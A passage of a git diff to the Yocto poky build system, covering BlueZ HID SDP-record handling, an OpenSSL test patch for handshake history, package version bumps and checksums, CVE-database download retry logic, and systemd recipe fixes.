*/ ++ return RECONNECT_ANY; ++} ++ ++static void extract_hid_props(struct input_device *idev, ++ const sdp_record_t *rec) ++{ ++ /* Extract HID connectability */ ++ bool reconnect_initiate, normally_connectable; ++ sdp_data_t *pdlist; ++ ++ /* HIDNormallyConnectable is optional and assumed FALSE if not ++ * present. ++ */ ++ pdlist = sdp_data_get(rec, SDP_ATTR_HID_RECONNECT_INITIATE); ++ reconnect_initiate = pdlist ? pdlist->val.uint8 : TRUE; ++ ++ pdlist = sdp_data_get(rec, SDP_ATTR_HID_NORMALLY_CONNECTABLE); ++ normally_connectable = pdlist ? pdlist->val.uint8 : FALSE; ++ ++ /* Update local values */ ++ idev->reconnect_mode = ++ hid_reconnection_mode(reconnect_initiate, normally_connectable); ++} ++ ++static void input_device_update_rec(struct input_device *idev) ++{ ++ struct btd_profile *p = btd_service_get_profile(idev->service); ++ const sdp_record_t *rec; ++ ++ rec = btd_device_get_record(idev->device, p->remote_uuid); ++ if (!rec || idev->rec == rec) ++ return; ++ ++ idev->rec = rec; ++ idev->disable_sdp = is_device_sdp_disable(rec); ++ ++ /* Initialize device properties */ ++ extract_hid_props(idev, rec); ++ ++ if (idev->disable_sdp) ++ device_set_refresh_discovery(idev->device, false); ++} ++ + static int input_device_connected(struct input_device *idev) + { + int err; +@@ -1168,6 +1204,9 @@ static int input_device_connected(struct input_device *idev) + if (idev->intr_io == NULL || idev->ctrl_io == NULL) + return -ENOTCONN; + ++ /* Attempt to update SDP record if it had changed */ ++ input_device_update_rec(idev); ++ + err = hidp_add_connection(idev); + if (err < 0) + return err; +@@ -1411,74 +1450,21 @@ int input_device_disconnect(struct btd_service *service) + return 0; + } + +-static bool is_device_sdp_disable(const sdp_record_t *rec) +-{ +- sdp_data_t *data; +- +- data = sdp_data_get(rec, SDP_ATTR_HID_SDP_DISABLE); +- +- return data && data->val.uint8; +-} +- +-static enum reconnect_mode_t hid_reconnection_mode(bool reconnect_initiate, +- bool normally_connectable) +-{ +- if (!reconnect_initiate && !normally_connectable) +- return RECONNECT_NONE; +- else if (!reconnect_initiate && normally_connectable) +- return RECONNECT_HOST; +- else if (reconnect_initiate && !normally_connectable) +- return RECONNECT_DEVICE; +- else /* (reconnect_initiate && normally_connectable) */ +- return RECONNECT_ANY; +-} +- +-static void extract_hid_props(struct input_device *idev, +- const sdp_record_t *rec) +-{ +- /* Extract HID connectability */ +- bool reconnect_initiate, normally_connectable; +- sdp_data_t *pdlist; +- +- /* HIDNormallyConnectable is optional and assumed FALSE +- * if not present. */ +- pdlist = sdp_data_get(rec, SDP_ATTR_HID_RECONNECT_INITIATE); +- reconnect_initiate = pdlist ? pdlist->val.uint8 : TRUE; +- +- pdlist = sdp_data_get(rec, SDP_ATTR_HID_NORMALLY_CONNECTABLE); +- normally_connectable = pdlist ? pdlist->val.uint8 : FALSE; +- +- /* Update local values */ +- idev->reconnect_mode = +- hid_reconnection_mode(reconnect_initiate, normally_connectable); +-} +- + static struct input_device *input_device_new(struct btd_service *service) + { + struct btd_device *device = btd_service_get_device(service); +- struct btd_profile *p = btd_service_get_profile(service); + const char *path = device_get_path(device); +- const sdp_record_t *rec = btd_device_get_record(device, p->remote_uuid); + struct btd_adapter *adapter = device_get_adapter(device); + struct input_device *idev; + +- if (!rec) +- return NULL; +- + idev = g_new0(struct input_device, 1); + bacpy(&idev->src, btd_adapter_get_address(adapter)); + bacpy(&idev->dst, device_get_address(device)); + idev->service = btd_service_ref(service); + idev->device = btd_device_ref(device); + idev->path = g_strdup(path); +- idev->handle = rec->handle; +- idev->disable_sdp = is_device_sdp_disable(rec); +- +- /* Initialize device properties */ +- extract_hid_props(idev, rec); + +- if (idev->disable_sdp) +- device_set_refresh_discovery(device, false); ++ input_device_update_rec(idev); + + return idev; + } +-- +2.42.0 + diff --git a/poky/meta/recipes-connectivity/openssl/openssl/0001-Added-handshake-history-reporting-when-test-fails.patch b/poky/meta/recipes-connectivity/openssl/openssl/0001-Added-handshake-history-reporting-when-test-fails.patch new file mode 100644 index 0000000000..aa2e5bb800 --- /dev/null +++ b/poky/meta/recipes-connectivity/openssl/openssl/0001-Added-handshake-history-reporting-when-test-fails.patch @@ -0,0 +1,374 @@ +From 5ba65051fea0513db0d997f0ab7cafb9826ed74a Mon Sep 17 00:00:00 2001 +From: William Lyu <William.Lyu@windriver.com> +Date: Fri, 20 Oct 2023 16:22:37 -0400 +Subject: [PATCH] Added handshake history reporting when test fails + +Upstream-Status: Submitted [https://github.com/openssl/openssl/pull/22481] + +Signed-off-by: William Lyu <William.Lyu@windriver.com> +--- + test/helpers/handshake.c | 139 +++++++++++++++++++++++++++++---------- + test/helpers/handshake.h | 70 +++++++++++++++++++- + test/ssl_test.c | 44 +++++++++++++ + 3 files changed, 218 insertions(+), 35 deletions(-) + +diff --git a/test/helpers/handshake.c b/test/helpers/handshake.c +index e0422469e4..ae2ad59dd4 100644 +--- a/test/helpers/handshake.c ++++ b/test/helpers/handshake.c +@@ -1,5 +1,5 @@ + /* +- * Copyright 2016-2022 The OpenSSL Project Authors. All Rights Reserved. ++ * Copyright 2016-2023 The OpenSSL Project Authors. All Rights Reserved. + * + * Licensed under the Apache License 2.0 (the "License"). You may not use + * this file except in compliance with the License. You can obtain a copy +@@ -24,6 +24,102 @@ + #include <netinet/sctp.h> + #endif + ++/* Shamelessly copied from test/helpers/ssl_test_ctx.c */ ++/* Maps string names to various enumeration type */ ++typedef struct { ++ const char *name; ++ int value; ++} enum_name_map; ++ ++static const enum_name_map connect_phase_names[] = { ++ {"Handshake", HANDSHAKE}, ++ {"RenegAppData", RENEG_APPLICATION_DATA}, ++ {"RenegSetup", RENEG_SETUP}, ++ {"RenegHandshake", RENEG_HANDSHAKE}, ++ {"AppData", APPLICATION_DATA}, ++ {"Shutdown", SHUTDOWN}, ++ {"ConnectionDone", CONNECTION_DONE} ++}; ++ ++static const enum_name_map peer_status_names[] = { ++ {"PeerSuccess", PEER_SUCCESS}, ++ {"PeerRetry", PEER_RETRY}, ++ {"PeerError", PEER_ERROR}, ++ {"PeerWaiting", PEER_WAITING}, ++ {"PeerTestFail", PEER_TEST_FAILURE} ++}; ++ ++static const enum_name_map handshake_status_names[] = { ++ {"HandshakeSuccess", HANDSHAKE_SUCCESS}, ++ {"ClientError", CLIENT_ERROR}, ++ {"ServerError", SERVER_ERROR}, ++ {"InternalError", INTERNAL_ERROR}, ++ {"HandshakeRetry", HANDSHAKE_RETRY} ++}; ++ ++/* Shamelessly copied from test/helpers/ssl_test_ctx.c */ ++static const char *enum_name(const enum_name_map *enums, size_t num_enums, ++ int value) ++{ ++ size_t i; ++ for (i = 0; i < num_enums; i++) { ++ if (enums[i].value == value) { ++ return enums[i].name; ++ } ++ } ++ return "InvalidValue"; ++} ++ ++const char *handshake_connect_phase_name(connect_phase_t phase) ++{ ++ return enum_name(connect_phase_names, OSSL_NELEM(connect_phase_names), ++ (int)phase); ++} ++ ++const char *handshake_status_name(handshake_status_t handshake_status) ++{ ++ return enum_name(handshake_status_names, OSSL_NELEM(handshake_status_names), ++ (int)handshake_status); ++} ++ ++const char *handshake_peer_status_name(peer_status_t peer_status) ++{ ++ return enum_name(peer_status_names, OSSL_NELEM(peer_status_names), ++ (int)peer_status); ++} ++ ++static void save_loop_history(HANDSHAKE_HISTORY *history, ++ connect_phase_t phase, ++ handshake_status_t handshake_status, ++ peer_status_t server_status, ++ peer_status_t client_status, ++ int client_turn_count, ++ int is_client_turn) ++{ ++ HANDSHAKE_HISTORY_ENTRY *new_entry = NULL; ++ ++ /* ++ * Create a new history entry for a handshake loop with statuses given in ++ * the arguments. Potentially evicting the oldest entry when the ++ * ring buffer is full. ++ */ ++ ++(history->last_idx); ++ history->last_idx &= MAX_HANDSHAKE_HISTORY_ENTRY_IDX_MASK; ++ ++ new_entry = &((history->entries)[history->last_idx]); ++ new_entry->phase = phase; ++ new_entry->handshake_status = handshake_status; ++ new_entry->server_status = server_status; ++ new_entry->client_status = client_status; ++ new_entry->client_turn_count = client_turn_count; ++ new_entry->is_client_turn = is_client_turn; ++ ++ /* Evict the oldest handshake loop entry when the ring buffer is full. */ ++ if (history->entry_count < MAX_HANDSHAKE_HISTORY_ENTRY) { ++ ++(history->entry_count); ++ } ++} ++ + HANDSHAKE_RESULT *HANDSHAKE_RESULT_new(void) + { + HANDSHAKE_RESULT *ret; +@@ -719,15 +815,6 @@ static void configure_handshake_ssl(SSL *server, SSL *client, + SSL_set_post_handshake_auth(client, 1); + } + +-/* The status for each connection phase. */ +-typedef enum { +- PEER_SUCCESS, +- PEER_RETRY, +- PEER_ERROR, +- PEER_WAITING, +- PEER_TEST_FAILURE +-} peer_status_t; +- + /* An SSL object and associated read-write buffers. */ + typedef struct peer_st { + SSL *ssl; +@@ -1074,17 +1161,6 @@ static void do_shutdown_step(PEER *peer) + } + } + +-typedef enum { +- HANDSHAKE, +- RENEG_APPLICATION_DATA, +- RENEG_SETUP, +- RENEG_HANDSHAKE, +- APPLICATION_DATA, +- SHUTDOWN, +- CONNECTION_DONE +-} connect_phase_t; +- +- + static int renegotiate_op(const SSL_TEST_CTX *test_ctx) + { + switch (test_ctx->handshake_mode) { +@@ -1162,19 +1238,6 @@ static void do_connect_step(const SSL_TEST_CTX *test_ctx, PEER *peer, + } + } + +-typedef enum { +- /* Both parties succeeded. */ +- HANDSHAKE_SUCCESS, +- /* Client errored. */ +- CLIENT_ERROR, +- /* Server errored. */ +- SERVER_ERROR, +- /* Peers are in inconsistent state. */ +- INTERNAL_ERROR, +- /* One or both peers not done. */ +- HANDSHAKE_RETRY +-} handshake_status_t; +- + /* + * Determine the handshake outcome. + * last_status: the status of the peer to have acted last. +@@ -1539,6 +1602,10 @@ static HANDSHAKE_RESULT *do_handshake_internal( + + start = time(NULL); + ++ save_loop_history(&(ret->history), ++ phase, status, server.status, client.status, ++ client_turn_count, client_turn); ++ + /* + * Half-duplex handshake loop. + * Client and server speak to each other synchronously in the same process. +@@ -1560,6 +1627,10 @@ static HANDSHAKE_RESULT *do_handshake_internal( + 0 /* server went last */); + } + ++ save_loop_history(&(ret->history), ++ phase, status, server.status, client.status, ++ client_turn_count, client_turn); ++ + switch (status) { + case HANDSHAKE_SUCCESS: + client_turn_count = 0; +diff --git a/test/helpers/handshake.h b/test/helpers/handshake.h +index 78b03f9f4b..b9967c2623 100644 +--- a/test/helpers/handshake.h ++++ b/test/helpers/handshake.h +@@ -1,5 +1,5 @@ + /* +- * Copyright 2016-2021 The OpenSSL Project Authors. All Rights Reserved. ++ * Copyright 2016-2023 The OpenSSL Project Authors. All Rights Reserved. + * + * Licensed under the Apache License 2.0 (the "License"). You may not use + * this file except in compliance with the License. You can obtain a copy +@@ -12,6 +12,11 @@ + + #include "ssl_test_ctx.h" + ++#define MAX_HANDSHAKE_HISTORY_ENTRY_BIT 4 ++#define MAX_HANDSHAKE_HISTORY_ENTRY (1 << MAX_HANDSHAKE_HISTORY_ENTRY_BIT) ++#define MAX_HANDSHAKE_HISTORY_ENTRY_IDX_MASK \ ++ ((1 << MAX_HANDSHAKE_HISTORY_ENTRY_BIT) - 1) ++ + typedef struct ctx_data_st { + unsigned char *npn_protocols; + size_t npn_protocols_len; +@@ -22,6 +27,63 @@ typedef struct ctx_data_st { + char *session_ticket_app_data; + } CTX_DATA; + ++typedef enum { ++ HANDSHAKE, ++ RENEG_APPLICATION_DATA, ++ RENEG_SETUP, ++ RENEG_HANDSHAKE, ++ APPLICATION_DATA, ++ SHUTDOWN, ++ CONNECTION_DONE ++} connect_phase_t; ++ ++/* The status for each connection phase. */ ++typedef enum { ++ PEER_SUCCESS, ++ PEER_RETRY, ++ PEER_ERROR, ++ PEER_WAITING, ++ PEER_TEST_FAILURE ++} peer_status_t; ++ ++typedef enum { ++ /* Both parties succeeded. */ ++ HANDSHAKE_SUCCESS, ++ /* Client errored. */ ++ CLIENT_ERROR, ++ /* Server errored. */ ++ SERVER_ERROR, ++ /* Peers are in inconsistent state. */ ++ INTERNAL_ERROR, ++ /* One or both peers not done. */ ++ HANDSHAKE_RETRY ++} handshake_status_t; ++ ++/* Stores the various status information in a handshake loop. */ ++typedef struct handshake_history_entry_st { ++ connect_phase_t phase; ++ handshake_status_t handshake_status; ++ peer_status_t server_status; ++ peer_status_t client_status; ++ int client_turn_count; ++ int is_client_turn; ++} HANDSHAKE_HISTORY_ENTRY; ++ ++typedef struct handshake_history_st { ++ /* Implemented using ring buffer. */ ++ /* ++ * The valid entries are |entries[last_idx]|, |entries[last_idx-1]|, ++ * ..., etc., going up to |entry_count| number of entries. Note that when ++ * the index into the array |entries| becomes < 0, we wrap around to ++ * the end of |entries|. ++ */ ++ HANDSHAKE_HISTORY_ENTRY entries[MAX_HANDSHAKE_HISTORY_ENTRY]; ++ /* The number of valid entries in |entries| array. */ ++ size_t entry_count; ++ /* The index of the last valid entry in the |entries| array. */ ++ size_t last_idx; ++} HANDSHAKE_HISTORY; ++ + typedef struct handshake_result { + ssl_test_result_t result; + /* These alerts are in the 2-byte format returned by the info_callback. */ +@@ -77,6 +139,8 @@ typedef struct handshake_result { + char *cipher; + /* session ticket application data */ + char *result_session_ticket_app_data; ++ /* handshake loop history */ ++ HANDSHAKE_HISTORY history; + } HANDSHAKE_RESULT; + + HANDSHAKE_RESULT *HANDSHAKE_RESULT_new(void); +@@ -95,4 +159,8 @@ int configure_handshake_ctx_for_srp(SSL_CTX *server_ctx, SSL_CTX *server2_ctx, + CTX_DATA *server2_ctx_data, + CTX_DATA *client_ctx_data); + ++const char *handshake_connect_phase_name(connect_phase_t phase); ++const char *handshake_status_name(handshake_status_t handshake_status); ++const char *handshake_peer_status_name(peer_status_t peer_status); ++ + #endif /* OSSL_TEST_HANDSHAKE_HELPER_H */ +diff --git a/test/ssl_test.c b/test/ssl_test.c +index ea608518f9..9d6b093c81 100644 +--- a/test/ssl_test.c ++++ b/test/ssl_test.c +@@ -26,6 +26,44 @@ static OSSL_LIB_CTX *libctx = NULL; + /* Currently the section names are of the form test-<number>, e.g. test-15. */ + #define MAX_TESTCASE_NAME_LENGTH 100 + ++static void print_handshake_history(const HANDSHAKE_HISTORY *history) ++{ ++ size_t first_idx; ++ size_t i; ++ size_t cur_idx; ++ const HANDSHAKE_HISTORY_ENTRY *cur_entry; ++ const char header_template[] = "|%14s|%16s|%16s|%16s|%17s|%14s|"; ++ const char body_template[] = "|%14s|%16s|%16s|%16s|%17d|%14s|"; ++ ++ TEST_info("The following is the server/client state " ++ "in the most recent %d handshake loops.", ++ MAX_HANDSHAKE_HISTORY_ENTRY); ++ ++ TEST_note("==================================================" ++ "=================================================="); ++ TEST_note(header_template, ++ "phase", "handshake status", "server status", ++ "client status", "client turn count", "is client turn"); ++ TEST_note("+--------------+----------------+----------------" ++ "+----------------+-----------------+--------------+"); ++ ++ first_idx = (history->last_idx - history->entry_count + 1) & ++ MAX_HANDSHAKE_HISTORY_ENTRY_IDX_MASK; ++ for (i = 0; i < history->entry_count; ++i) { ++ cur_idx = (first_idx + i) & MAX_HANDSHAKE_HISTORY_ENTRY_IDX_MASK; ++ cur_entry = &(history->entries)[cur_idx]; ++ TEST_note(body_template, ++ handshake_connect_phase_name(cur_entry->phase), ++ handshake_status_name(cur_entry->handshake_status), ++ handshake_peer_status_name(cur_entry->server_status), ++ handshake_peer_status_name(cur_entry->client_status), ++ cur_entry->client_turn_count, ++ cur_entry->is_client_turn ? "true" : "false"); ++ } ++ TEST_note("==================================================" ++ "=================================================="); ++} ++ + static const char *print_alert(int alert) + { + return alert ? SSL_alert_desc_string_long(alert) : "no alert"; +@@ -388,6 +426,12 @@ static int check_test(HANDSHAKE_RESULT *result, SSL_TEST_CTX *test_ctx) + ret &= check_client_sign_type(result, test_ctx); + ret &= check_client_ca_names(result, test_ctx); + } ++ ++ /* Print handshake loop history if any check fails. */ ++ if (!ret) { ++ print_handshake_history(&(result->history)); ++ } ++ + return ret; + } + +-- +2.25.1 + diff --git a/poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb b/poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb index b1d5d8766f..0fe4e76808 100644 --- a/poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb +++ b/poky/meta/recipes-connectivity/openssl/openssl_3.1.4.bb @@ -12,6 +12,7 @@ SRC_URI = "http://www.openssl.org/source/openssl-${PV}.tar.gz \ file://0001-buildinfo-strip-sysroot-and-debug-prefix-map-from-co.patch \ file://0001-Configure-do-not-tweak-mips-cflags.patch \ file://fix_random_labels.patch \ + file://0001-Added-handshake-history-reporting-when-test-fails.patch \ " SRC_URI:append:class-nativesdk = " \ diff --git a/poky/meta/recipes-core/base-passwd/base-passwd/0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch b/poky/meta/recipes-core/base-passwd/base-passwd/0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch deleted file mode 100644 index 2cc6174e2a..0000000000 --- a/poky/meta/recipes-core/base-passwd/base-passwd/0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch +++ /dev/null @@ -1,35 +0,0 @@ -From 25e3bf09bbbb04aa930ea0fd9f28809a24fb7194 Mon Sep 17 00:00:00 2001 -From: Peter Kjellerstedt <pkj@axis.com> -Date: Sun, 2 Oct 2022 17:47:29 +0200 -Subject: [PATCH] Make it possible to configure whether to use SELinux or not - -Upstream-Status: Backport [https://salsa.debian.org/debian/base-passwd/-/commit/396c41bb35e03c5dcc727aa9f74218a45874ac1f] -Signed-off-by: Peter Kjellerstedt <peter.kjellerstedt@axis.com> ---- - configure.ac | 13 ++++++++++++- - 1 file changed, 12 insertions(+), 1 deletion(-) - -diff --git a/configure.ac b/configure.ac -index 589df88..e46403b 100644 ---- a/configure.ac -+++ b/configure.ac -@@ -13,7 +13,18 @@ AC_SYS_LARGEFILE - - dnl Scan for things we need - AC_CHECK_FUNCS([putgrent]) --AC_CHECK_LIB([selinux], [is_selinux_enabled]) -+ -+dnl Check for SELinux -+AC_MSG_CHECKING([whether to enable SELinux support]) -+AC_ARG_ENABLE([selinux], -+ [AS_HELP_STRING([--disable-selinux], [disable support for SELinux])], -+ [], -+ [enable_selinux=yes]) -+AC_MSG_RESULT($enable_selinux) -+AS_IF([test "x$enable_selinux" != xno], -+ [AC_CHECK_LIB([selinux], [is_selinux_enabled], [], -+ [AC_MSG_ERROR( -+ [SELinux support not available (use --disable-selinux to disable)])])]) - - dnl Check for debconf - AC_MSG_CHECKING([whether to enable debconf support]) diff --git a/poky/meta/recipes-core/base-passwd/base-passwd_3.6.1.bb b/poky/meta/recipes-core/base-passwd/base-passwd_3.6.2.bb index 44bcfb0199..bb4b49e6ab 100644 --- a/poky/meta/recipes-core/base-passwd/base-passwd_3.6.1.bb +++ b/poky/meta/recipes-core/base-passwd/base-passwd_3.6.2.bb @@ -11,12 +11,11 @@ SRC_URI = "https://launchpad.net/debian/+archive/primary/+files/${BPN}_${PV}.tar file://0003-Remove-for-root-since-we-do-not-have-an-etc-shadow.patch \ file://0004-Add-an-input-group-for-the-dev-input-devices.patch \ file://0005-Add-kvm-group.patch \ - file://0006-Make-it-possible-to-configure-whether-to-use-SELinux.patch \ file://0007-Add-wheel-group.patch \ file://0001-base-passwd-Add-the-sgx-group.patch \ " -SRC_URI[sha256sum] = "6ff369be59d586ba63c0c5fcb00f75f9953fe49db88bc6c6428f2c92866f79af" +SRC_URI[sha256sum] = "06dc78352bf38a8df76ff295e15ab5654cdefe41e62368b15bfcbbab8e4ec2a0" # the package is taken from launchpad; that source is static and goes stale # so we check the latest upstream from a directory that does get updated diff --git a/poky/meta/recipes-core/ell/ell_0.59.bb b/poky/meta/recipes-core/ell/ell_0.60.bb index 0483dbe582..4e414f3b90 100644 --- a/poky/meta/recipes-core/ell/ell_0.59.bb +++ b/poky/meta/recipes-core/ell/ell_0.60.bb @@ -15,7 +15,7 @@ DEPENDS = "dbus" inherit autotools pkgconfig SRC_URI = "https://mirrors.edge.kernel.org/pub/linux/libs/${BPN}/${BPN}-${PV}.tar.xz" -SRC_URI[sha256sum] = "370dc2b7c73cd57856017180a2a70a15ca1b0183bfd453b3cffe2d707c37da3d" +SRC_URI[sha256sum] = "61cec2df694b548e51afa3e7ffd1e1ad31a9fea7bedb93a3a3cc60894390c70f" do_configure:prepend () { mkdir -p ${S}/build-aux diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.0.bb b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.1.bb index 500e4e873e..a490262112 100644 --- a/poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.0.bb +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0_2.78.1.bb @@ -19,7 +19,7 @@ SRC_URI:append:class-native = " file://relocate-modules.patch \ file://0001-meson.build-do-not-enable-pidfd-features-on-native-g.patch \ " -SRC_URI[sha256sum] = "44eaab8b720877ce303c5540b657b126f12dc94972d9880b52959f43fb537b30" +SRC_URI[sha256sum] = "915bc3d0f8507d650ead3832e2f8fb670fce59aac4d7754a7dab6f1e6fed78b2" # Find any meson cross files in FILESPATH that are relevant for the current # build (using siteinfo) and add them to EXTRA_OEMESON. diff --git a/poky/meta/recipes-core/glibc/glibc-version.inc b/poky/meta/recipes-core/glibc/glibc-version.inc index 19b98bc11a..0ef4289557 100644 --- a/poky/meta/recipes-core/glibc/glibc-version.inc +++ b/poky/meta/recipes-core/glibc/glibc-version.inc @@ -1,6 +1,6 @@ SRCBRANCH ?= "release/2.38/master" PV = "2.38+git" -SRCREV_glibc ?= "750a45a783906a19591fb8ff6b7841470f1f5701" +SRCREV_glibc ?= "44f757a6364a546359809d48c76b3debd26e77d4" SRCREV_localedef ?= "e0eca29583b9e0f62645c4316ced93cf4e4e26e1" GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git;protocol=https" diff --git a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb index 2b164afc99..3a049b8e37 100644 --- a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb +++ b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb @@ -26,7 +26,7 @@ inherit core-image setuptools3 features_check REQUIRED_DISTRO_FEATURES += "xattr" -SRCREV ?= "3bcf525a688a9989ac37394f44a831d54b01ba14" +SRCREV ?= "59e8c565ef9cddb4cab90017d187368aa34f361b" SRC_URI = "git://git.yoctoproject.org/poky;branch=nanbield \ file://Yocto_Build_Appliance.vmx \ file://Yocto_Build_Appliance.vmxf \ diff --git a/poky/meta/recipes-core/meta/cve-update-nvd2-native.bb b/poky/meta/recipes-core/meta/cve-update-nvd2-native.bb index d0321f1bb5..bfe48b27e7 100644 --- a/poky/meta/recipes-core/meta/cve-update-nvd2-native.bb +++ b/poky/meta/recipes-core/meta/cve-update-nvd2-native.bb @@ -26,8 +26,8 @@ NVDCVE_API_KEY ?= "" # Use a negative value to skip the update CVE_DB_UPDATE_INTERVAL ?= "86400" -# Timeout for blocking socket operations, such as the connection attempt. -CVE_SOCKET_TIMEOUT ?= "60" +# Number of attmepts for each http query to nvd server before giving up +CVE_DB_UPDATE_ATTEMPTS ?= "5" CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_2.db" @@ -114,7 +114,10 @@ def cleanup_db_download(db_file, db_tmp_file): if os.path.exists(db_tmp_file): os.remove(db_tmp_file) -def nvd_request_next(url, api_key, args): +def nvd_request_wait(attempt, min_wait): + return min ( ( (2 * attempt) + min_wait ) , 30) + +def nvd_request_next(url, attempts, api_key, args, min_wait): """ Request next part of the NVD dabase """ @@ -130,7 +133,7 @@ def nvd_request_next(url, api_key, args): request.add_header("apiKey", api_key) bb.note("Requesting %s" % request.full_url) - for attempt in range(5): + for attempt in range(attempts): try: r = urllib.request.urlopen(request) @@ -143,8 +146,10 @@ def nvd_request_next(url, api_key, args): r.close() except Exception as e: - bb.note("CVE database: received error (%s), retrying" % (e)) - time.sleep(6) + wait_time = nvd_request_wait(attempt, min_wait) + bb.note("CVE database: received error (%s)" % (e)) + bb.note("CVE database: retrying download after %d seconds. attempted (%d/%d)" % (wait_time, attempt+1, attempts)) + time.sleep(wait_time) pass else: return raw_data @@ -186,10 +191,16 @@ def update_db_file(db_tmp_file, d, database_time): index = 0 url = d.getVar("NVDCVE_URL") api_key = d.getVar("NVDCVE_API_KEY") or None + attempts = int(d.getVar("CVE_DB_UPDATE_ATTEMPTS")) + + # Recommended by NVD + wait_time = 6 + if api_key: + wait_time = 2 while True: req_args['startIndex'] = index - raw_data = nvd_request_next(url, api_key, req_args) + raw_data = nvd_request_next(url, attempts, api_key, req_args, wait_time) if raw_data is None: # We haven't managed to download data return False @@ -209,7 +220,7 @@ def update_db_file(db_tmp_file, d, database_time): break # Recommended by NVD - time.sleep(6) + time.sleep(wait_time) # Update success, set the date to cve_check file. cve_f.write('CVE database update : %s\n\n' % datetime.date.today()) diff --git a/poky/meta/recipes-core/systemd/systemd-boot_254.4.bb b/poky/meta/recipes-core/systemd/systemd-boot_254.4.bb index 4ee25ee72f..2b43ccf243 100644 --- a/poky/meta/recipes-core/systemd/systemd-boot_254.4.bb +++ b/poky/meta/recipes-core/systemd/systemd-boot_254.4.bb @@ -8,6 +8,10 @@ DEPENDS = "intltool-native libcap util-linux gperf-native python3-jinja2-native inherit meson pkgconfig gettext inherit deploy +SRC_URI += " \ + file://0030-meson-Pass-all-static-pie-args-to-linker.patch \ + " + LDFLAGS:prepend = "${@ " ".join(d.getVar('LD').split()[1:])} " EFI_LD = "bfd" diff --git a/poky/meta/recipes-core/systemd/systemd-compat-units.bb b/poky/meta/recipes-core/systemd/systemd-compat-units.bb index 253bc9fcf1..c03d97f9c9 100644 --- a/poky/meta/recipes-core/systemd/systemd-compat-units.bb +++ b/poky/meta/recipes-core/systemd/systemd-compat-units.bb @@ -27,7 +27,8 @@ SYSTEMD_DISABLED_SYSV_SERVICES = " \ pkg_postinst:${PN} () { - cd $D${sysconfdir}/init.d || exit 0 + test -d $D${sysconfdir}/init.d || exit 0 + cd $D${sysconfdir}/init.d echo "Disabling the following sysv scripts: " diff --git a/poky/meta/recipes-core/systemd/systemd.inc b/poky/meta/recipes-core/systemd/systemd.inc index 3ba0b5ffc5..ccc3236457 100644 --- a/poky/meta/recipes-core/systemd/systemd.inc +++ b/poky/meta/recipes-core/systemd/systemd.inc @@ -10,7 +10,8 @@ state, maintains mount and automount points and implements an \ elaborate transactional dependency-based service control logic. It can \ work as a drop-in replacement for sysvinit." -LICENSE = "GPL-2.0-only & LGPL-2.1-only" +LICENSE = "GPL-2.0-only & LGPL-2.1-or-later" +LICENSE:libsystemd = "LGPL-2.1-or-later" LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \ file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c" diff --git a/poky/meta/recipes-core/systemd/systemd/0030-meson-Pass-all-static-pie-args-to-linker.patch b/poky/meta/recipes-core/systemd/systemd/0030-meson-Pass-all-static-pie-args-to-linker.patch new file mode 100644 index 0000000000..8e563238ef --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/0030-meson-Pass-all-static-pie-args-to-linker.patch @@ -0,0 +1,35 @@ +From f85a387a67900b02c69abccb88c2ef7191c67277 Mon Sep 17 00:00:00 2001 +From: Jan Janssen <medhefgo@web.de> +Date: Sun, 1 Oct 2023 09:55:48 +0200 +Subject: [PATCH] meson: Pass all -static-pie args to linker + +Fixes: #29381 + +Upstream-Status: Backport [https://github.com/systemd/systemd/commit/cecbb162a3134b43d2ca160e13198c73ff34c3ef] +Signed-off-by: Viswanath Kraleti <quic_vkraleti@quicinc.com> +--- + src/boot/efi/meson.build | 11 ++++++++--- + 1 file changed, 8 insertions(+), 3 deletions(-) + +diff --git a/src/boot/efi/meson.build b/src/boot/efi/meson.build +index 2773eaf286..9a60a57329 100644 +--- a/src/boot/efi/meson.build ++++ b/src/boot/efi/meson.build +@@ -161,9 +161,14 @@ efi_c_ld_args = [ + '-Wl,--entry=efi_main', + '-Wl,--fatal-warnings', + +- # These flags should be passed by -static-pie, but seem to be missing sometimes. +- '-Wl,--no-dynamic-linker', +- '-z', 'text', ++ # These flags should be passed by -static-pie, but for whatever reason the flag translation ++ # is not enabled on all architectures. Not passing `-static` would just allow the linker to ++ # use dynamic libraries, (which we can't/don't use anyway). But if `-pie` is missing and the ++ # gcc build does not default to `-pie` we get a regular (no-pie) binary that will be ++ # rightfully rejected by elf2efi. Note that meson also passes `-pie` to the linker driver, ++ # but it is overridden by our `-static-pie`. We also need to pass these directly to the ++ # linker as `-static`+`-pie` seem to get translated differently. ++ '-Wl,-static,-pie,--no-dynamic-linker,-z,text', + + # EFI has 4KiB pages. + '-z', 'common-page-size=4096', diff --git a/poky/meta/recipes-core/systemd/systemd_254.4.bb b/poky/meta/recipes-core/systemd/systemd_254.4.bb index 77724eb822..285ca92e68 100644 --- a/poky/meta/recipes-core/systemd/systemd_254.4.bb +++ b/poky/meta/recipes-core/systemd/systemd_254.4.bb @@ -178,7 +178,7 @@ PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd" PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname" PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false" PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers=" -PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false" +PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false,,libnss-systemd" PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false" 